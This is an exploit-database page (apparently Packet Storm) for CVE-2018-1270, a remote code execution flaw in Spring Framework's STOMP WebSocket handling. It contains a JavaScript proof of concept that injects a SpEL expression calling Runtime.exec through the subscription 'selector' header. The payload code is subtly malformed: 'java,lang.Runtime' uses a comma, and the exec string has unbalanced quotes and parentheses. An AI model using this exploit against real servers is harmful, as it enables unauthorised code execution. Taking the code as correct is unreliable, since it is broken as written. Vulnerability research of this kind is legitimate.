Pivotal Spring Java Framework versions 5.0.x and below suffer from a remote code execution vulnerability.
087734b5669bd630cd35fdbf2949d5549fe449eabe22b9c19c3956d3e1cd2462# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
# Date: 2018-05-28
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage:
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
# CVE: CVE: CVE-2018-1270
# Version: <= 5.0.x
# Description: By connecting to spring STOMP, and putting the key for "selector"
# header, we can execute code on Spring.
# POC:
# Here' we are writting java commands to be executed within the selector header
# Connecting to a web socket using SockJS
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable
var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};
var socket = new SockJS('/gs-guide-websocket');
var stompClient = webstomp.over(socket);
stompClient.connect({}, function (frame){
setConnected(true);
console.log('Connected: ' + frame);
stompClient.subscribe('/topic/greetings', function(greeting){
showGreeting(JSON.parse(greeting.body).content);
},header);
});
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed